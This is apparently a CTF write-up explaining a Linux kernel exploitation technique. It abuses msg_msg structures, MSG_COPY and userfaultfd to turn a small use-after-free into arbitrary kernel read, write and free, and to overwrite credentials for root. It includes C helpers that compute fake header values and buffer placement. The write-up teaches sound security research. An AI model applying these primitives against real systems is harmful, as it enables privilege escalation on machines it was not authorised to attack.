In corCTF 2021, D3v17 and I wrote two kernel challenges, Fire of Salvation and Wall of Perdition, built around a technique that is novel (at least to our knowledge) for gaining arbitrary read and arbitrary write in kernel land, which I'll shorten to arb read and arb write. A famous kernel object often abused for heap sprays is the msg_msg struct, an elastic kernel object meant for IPC (System V message queues) whose allocations range from kmalloc-64 to kmalloc-4k. There was also a recent writeup by Linux kernel developer and security researcher Alexander Popov in which he abused msg_msg for arb read in his exploit for CVE-2021-26708. D3v17 and I read this and asked ourselves: is it possible to achieve arb write with msg_msg across any valid slab for it? After a week or two of digging around, we found a way to achieve arb write on kmalloc-4k slabs, and then a way to do it for any valid msg_msg slab. In this post, I'll detail the Fire of Salvation writeup, which covers arb write on kmalloc-4k slabs. I'll also provide a tldr with the insights for arb write on any valid msg_msg slab, along with a summary of my approach for the second challenge, but D3v17 will cover that in detail in his post on Wall of Perdition. Since this writeup is quite long, feel free to let me know of any unclear explanations or mistakes.
In this challenge, the following key protections were enabled on a 5.8 kernel: FG-KASLR, SLAB_RANDOM, SLAB_HARDENED, and STATIC_USERMODE_HELPER. The kernel also used the SLAB allocator, and we provided the corresponding kernel.config file with all the other miscellaneous options (such as enabling the userfaultfd syscall, hardened_usercopy, CHECKPOINT_RESTORE, etc.). SMAP, SMEP, and KPTI being on was a given. Also, since our goal was to introduce players to a novel exploitation technique, we didn't care much about the reversing needed to find a bug, and didn't want to overcomplicate the bug itself. In our discussions, we decided to just make the bug a pretty obvious UAF that limits players to around 0x28 to 0x30 bytes of UAF write (no UAF read). This was the source we provided to all the players (we were also nice enough to give out a vmlinux with debug symbols and structs):
Exploitation-wise, there are a few serious roadblocks that prevent common exploit paths and necessitate good arb read and arb write primitives. The fact that the kernel is using the SLAB allocator means that no freelist pointer will be on the chunks themselves (and even if there were, it probably wouldn't be within the 0x30 UAF region, as the Linux kernel has moved it further down for certain slabs). FG-KASLR will complicate overwriting function pointers (such as the one in the sk_buff struct's destructor arg callback in the CVE writeup), as most gadgets not in the earlier parts of .text will be affected; ROP is still possible, but I believe that would entail first arb reading the ksymtab entry of whichever function the gadget lives in. Lastly, with STATIC_USERMODE_HELPER (and its path set to “”), the classic SMAP bypasses of targeting modprobe_path or core_pattern no longer work. The path itself is now located in a read-only section of the kernel according to readelf. At this point, the most direct way to bypass SMAP is probably to arb read the doubly linked list of task structures to find the current task, and then overwrite its cred pointer with one that gives us root privileges. A physmap spray would be another common approach, but that's just painful.
Do note again that the vulnerability only gives a small window of UAF write, without UAF read. Once we allocate a few chunks to help smooth out the SLAB shuffling on the current slab, we can begin the exploitation procedure. Let's first take a detour into msg_msg (the msgsnd and msgrcv manpages can be quite helpful). I consistently use the IPC_NOWAIT option to avoid hangs and a msgtyp of zero to pull from the front of the msg_queue. For reference, here is the msg_msg struct:
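As a sketch rather than the kernel's own header, the layout can be mirrored in userland C with fixed-width fields. This assumes x86-64 and 4 KiB pages; the `_mirror` type names and `PAGE_SIZE_ASSUMED` are made up for illustration, while the field names follow the kernel's struct msg_msg and struct msg_msgseg.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE_ASSUMED 4096u /* assumption: 4 KiB pages */

/* Userland mirror of struct list_head (two pointers). */
struct list_head_mirror {
    uint64_t next;
    uint64_t prev;
};

/* Userland mirror of struct msg_msg; the message data follows the header. */
struct msg_msg_mirror {
    struct list_head_mirror m_list; /* 0x00: links into the queue      */
    int64_t  m_type;                /* 0x10: message type              */
    uint64_t m_ts;                  /* 0x18: message text size         */
    uint64_t next;                  /* 0x20: first struct msg_msgseg * */
    uint64_t security;              /* 0x28: LSM blob pointer          */
};

/* Userland mirror of struct msg_msgseg; segment data follows the pointer. */
struct msg_msgseg_mirror {
    uint64_t next;
};

/* Payload capacity of the first chunk and of each later segment. */
#define DATALEN_MSG (PAGE_SIZE_ASSUMED - sizeof(struct msg_msg_mirror))
#define DATALEN_SEG (PAGE_SIZE_ASSUMED - sizeof(struct msg_msgseg_mirror))

/* The whole header is 0x30 bytes, the same size as the UAF write window. */
static_assert(sizeof(struct msg_msg_mirror) == 0x30, "header is 0x30 bytes");
static_assert(offsetof(struct msg_msg_mirror, next) == 0x20, "next at 0x20");
```

The takeaway is that a 0x28 to 0x30 byte write from the start of the object reaches both m_ts and next, which are the two fields the rest of this post cares about.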
Looking at do_msgsnd:
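The part of the send path that matters most here is how one message gets split across allocations. The following is a userland model of that split, not kernel code: the helper names are hypothetical, and the constants assume x86-64 with 4 KiB pages and a 0x30 byte msg_msg header.

```c
#include <assert.h>
#include <stddef.h>

#define MSG_HDR_SIZE 0x30u /* sizeof(struct msg_msg) on x86-64    */
#define SEG_HDR_SIZE 0x08u /* sizeof(struct msg_msgseg) on x86-64 */
#define DATALEN_MSG  (4096u - MSG_HDR_SIZE) /* 4048 bytes of payload */
#define DATALEN_SEG  (4096u - SEG_HDR_SIZE) /* 4088 bytes of payload */

/* Two completely full chunks still fit under the default msgmax of 8192. */
static_assert(DATALEN_MSG + DATALEN_SEG <= 8192u, "two chunks fit in msgmax");

/* Allocation size requested for the first chunk of a len-byte message. */
size_t first_alloc_size(size_t len)
{
    size_t alen = len < DATALEN_MSG ? len : DATALEN_MSG;
    return MSG_HDR_SIZE + alen;
}

/* Total number of allocations (msg_msg plus segments) for a message. */
size_t msg_chunk_count(size_t len)
{
    size_t chunks = 1;
    size_t alen = len < DATALEN_MSG ? len : DATALEN_MSG;

    len -= alen;
    while (len > 0) {
        alen = len < DATALEN_SEG ? len : DATALEN_SEG;
        len -= alen;
        chunks++;
    }
    return chunks;
}
```

For example, a 16 byte message asks for 0x40 bytes and lands in kmalloc-64, while anything above 4048 bytes fills a whole kmalloc-4k chunk and spills into at least one segment.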
Now, let's take a look at do_msgrcv:
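From the userland side, the flag of interest on the receive path is MSG_COPY, which needs CONFIG_CHECKPOINT_RESTORE, must be combined with IPC_NOWAIT, and treats msgtyp as an index into the queue instead of a type. Here is a minimal sketch of peeking at a message and then receiving it normally; `struct demo_msg` and `peek_then_receive` are names I made up, and the function simply returns 0 if the environment refuses any of the syscalls.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#ifndef MSG_COPY
#define MSG_COPY 040000 /* value from the Linux UAPI headers */
#endif

struct demo_msg {
    long mtype;
    char mtext[64];
};

/*
 * Returns 1 if a MSG_COPY peek left the message in the queue and a normal
 * receive then returned the same bytes, 0 if a syscall failed (for example
 * no MSG_COPY support), and -1 if the two reads disagree.
 */
int peek_then_receive(const char *payload)
{
    struct demo_msg out, peek, in;
    ssize_t peeked, received;
    size_t len;
    int qid, result = 0;

    assert(payload != NULL);
    len = strlen(payload) + 1;
    if (len > sizeof(out.mtext))
        return 0;

    qid = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
    if (qid < 0)
        return 0;

    out.mtype = 1;
    memcpy(out.mtext, payload, len);
    if (msgsnd(qid, &out, len, IPC_NOWAIT) < 0)
        goto done;

    /* Peek at index 0 without unlinking the message from the queue. */
    peeked = msgrcv(qid, &peek, sizeof(peek.mtext), 0, MSG_COPY | IPC_NOWAIT);
    if (peeked < 0)
        goto done;

    /* A normal receive with msgtyp 0 pulls the first message and frees it. */
    received = msgrcv(qid, &in, sizeof(in.mtext), 0, IPC_NOWAIT);
    if (received < 0)
        goto done;

    result = (peeked == (ssize_t)len && received == (ssize_t)len &&
              memcmp(peek.mtext, in.mtext, len) == 0) ? 1 : -1;
done:
    msgctl(qid, IPC_RMID, NULL);
    return result;
}
```

Calling `peek_then_receive("hello")` on a kernel with CHECKPOINT_RESTORE enabled should take the success path; the point is only that the peek does not consume the message.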
Now, let us think about abusing a UAF over these elastic objects for arb read and arb write. By modifying the next pointer or the size, arb read via msg_msg should be quite trivial, except that unlinking the message from the queue would destroy it (unless you can somehow skip modifying the first few qwords, which you can't in this challenge). You can try to modify the size so that it leaks more data after the first chunk of the msg_msg object, but hardened usercopy would stop you dead in your tracks. However, this is where MSG_COPY comes into play. Not only does it not unlink your message, but it also uses memcpy for the initial copying of data into a separate kernel-side copy, so the usercopy check never runs against the corrupted object! So now, we can happily modify the next pointer and change the m_ts field. This technique has already been documented in Popov's CVE writeup. The only restriction is that your fake next segment has to start with a null qword, to avoid kernel panics or having the kernel follow it somewhere you do not want it to go.
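To make the arithmetic concrete, here is a sketch of how I would compute the two fake header values for a single read. The struct and function names are hypothetical, and it assumes x86-64, 4 KiB pages, and that the corrupted msg_msg sits in a full kmalloc-4k chunk, as it does in this challenge.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define DATALEN_MSG 4048u /* 4096 - sizeof(struct msg_msg)    */
#define DATALEN_SEG 4088u /* 4096 - sizeof(struct msg_msgseg) */

struct arb_read_plan {
    uint64_t fake_m_ts;   /* value to write into msg_msg.m_ts            */
    uint64_t fake_next;   /* value to write into msg_msg.next            */
    size_t   leak_offset; /* offset of leaked bytes in the mtext we get  */
    size_t   min_bufsz;   /* smallest msgrcv size that MSG_COPY accepts  */
};

/*
 * Plan a leak of nbytes starting at target. The fake segment header is
 * the qword at target - 8, which must read as NULL so the chain ends.
 */
struct arb_read_plan plan_arb_read(uint64_t target, size_t nbytes)
{
    struct arb_read_plan p;

    assert(target >= 8);
    assert(nbytes <= DATALEN_SEG); /* stay within one fake segment */

    p.fake_next   = target - 8;
    p.fake_m_ts   = (uint64_t)DATALEN_MSG + nbytes;
    p.leak_offset = DATALEN_MSG;          /* segment data follows chunk one */
    p.min_bufsz   = DATALEN_MSG + nbytes; /* copy must be >= fake m_ts      */
    return p;
}
```

After the UAF write, an msgrcv with MSG_COPY | IPC_NOWAIT and a size of at least `min_bufsz` should return the target bytes starting at `mtext + leak_offset`.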
How would we approach arb write then? This is where every Linux kernel exploit developer's good friend userfaultfd comes back (rip to the new unprivileged userfaultfd settings from 5.11 onwards). During the msgsnd process, if you have a UAF over the first part of the msg_msg object, you can send a message large enough to require more than one allocation. Then, if you abuse userfaultfd to hang the copy right before the kernel reads the value of the next pointer (such as when it's a few bytes away from finishing the copy into the first chunk), you can use the UAF to change this next pointer, and you achieve arbitrary write once you release the hang! Of course, just like arb read, this requires the target region to start with a null qword. To make this clearer, take a look at the following diagram:
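The buffer placement behind that hang is just pointer arithmetic. Below is a sketch with hypothetical helper names, assuming x86-64 (an 8 byte mtype in front of mtext), 4 KiB pages, and a mapping where the page before `fault_page` is already populated while `fault_page` itself is registered with userfaultfd.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MTYPE_SIZE  8u    /* sizeof(long) on x86-64                  */
#define DATALEN_MSG 4048u /* payload bytes held by the first chunk   */

/*
 * Address to pass as msgp so that the kernel's copy into the first chunk
 * faults on fault_page with bytes_left bytes of that chunk still to copy.
 * The kernel has not read msg->next yet at that point.
 */
uint64_t msgbuf_addr_for_hang(uint64_t fault_page, size_t bytes_left)
{
    assert(bytes_left >= 1 && bytes_left <= DATALEN_MSG);
    return fault_page - (MTYPE_SIZE + DATALEN_MSG - bytes_left);
}

/*
 * Value to place in msg_msg.next during the hang so that the segment copy
 * lands on target. The qword at target - 8 acts as the fake segment's
 * next pointer and must be NULL.
 */
uint64_t fake_next_for_write(uint64_t target)
{
    assert(target >= 8);
    return target - 8;
}
```

With `bytes_left` set to 8, for instance, the first 4040 payload bytes come from the populated page, the copy stalls on the last qword, and the bytes written to the target are whatever the fault handler later supplies from offset `bytes_left` of the faulting page onwards.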
As for the Wall of Perdition challenge, I will only provide a brief summary of my solution, which I believe might slightly differ from D3v17's. His post on this part will be much more detailed, with many more diagrams to come.
In this second part, the sizes are limited to kmalloc-64; I wasn't aware of any commonly known abusable structures in this range. While arb read is still quite trivial thanks to MSG_COPY, using it to get a kernel base leak with FG-KASLR is not as easy. Arb write becomes even harder as well.
Now, for arb write, I reused the target queue from earlier, cleared the large msg out of it, and replaced it with a msg_msg object that has two 4k chunks in its chain (this is getting quite close to the default msg_msg size limit). I can abuse the previous technique to leak the address of this new 4k msg_msg object along with the address of its msg segment. Then, I freed this large object with msgrcv (later allocations will hand the chunks back in the order of the leaked segment address and then the leaked msg_msg object, due to LIFO). I then msgsnd another message large enough to require two 4k chunks, hang it with userfaultfd in load_msg, and quickly arb free its segment with msgrcv via the msg_msg under UAF control in the front queue. No crashes will occur since I fixed its pointers to point right back to the front queue itself.
With this arb free primitive in hand, I send another message in another message queue that was previously allocated; it will also be hung while reading in userland data. The object is just large enough to cover a 4k chunk (to get back the last freed chunk due to LIFO) with a small segment chained behind it. I then let the data transfer from the original hang continue, which lets me overwrite the next pointer of the currently allocated msg_msg object, thereby giving me arb write once I let this second hang continue and finish. This might seem quite insane, but I promise you that D3v17's blogpost will make this quite clear with his diagrams.
Here is my final exploit, which only had about a 50% success rate.